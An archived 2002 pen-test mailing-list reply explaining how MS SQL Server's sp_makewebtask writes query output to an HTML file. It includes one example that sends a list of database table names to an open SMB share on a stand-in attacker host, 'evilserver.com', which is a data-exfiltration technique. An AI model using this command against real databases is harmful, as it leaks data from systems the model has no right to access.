Re: Send output to file in SQL

From: Kevin Spett (kspett@spidynamics.com)
Date: 03/15/02 

From: "Kevin Spett" <kspett@spidynamics.com>
To: "Alex Harasic" <aharasic@terra.cl>, <pen-test@securityfocus.com>
Date: Fri, 15 Mar 2002 14:28:22 -0800

I'm not sure if you meant "stored procedure" when you said "extended
procedure". If you didn't, here's on answer.

sp_makewebtask works great for this. It builds an html table with the output
of your query. It's installed by default without any kind of access
control. It works like this:

    sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
    (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)

You can even specify a UNC path for the output file, like this:
    sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.

Hope this helps.

Kevin Spett
Web Application Security Ninja
SPI Dynamics, Inc.

----- Original Message -----
From: "Alex Harasic" <aharasic@terra.cl>
To: <pen-test@securityfocus.com>
Sent: Wednesday, March 13, 2002 9:05 AM
Subject: Send output to file in SQL

>
>
> Hi, I've been looking around for ways to send output
> to a file in a sql query. I know there is one for mySQL
> but not for msSQL.
>
> Anyone knows a way to send the output in a query
> without using extended procedures?
>
>
> Alex S. Harasic
> aharasic@terra.cl
>
> -------------------------------------------------------------------------- 

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • Re: SQL Injection - retrieving all rows
    ... (I'm pretty sure in SQL Server to use quoted parameters inside of quotes ... >> This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... Anyways have never tried Ettercap for VNC. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • Re: ettercap help
    ... > I can get it to sniff telnet, ftp, pop, smb, but no vnc. ... > This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Wardialing
    ... >>> achieving the connection with the modem. ... >>This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • RE: How to Tackle the Legal Tangle?
    ... How to Tackle the Legal Tangle? ... >This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)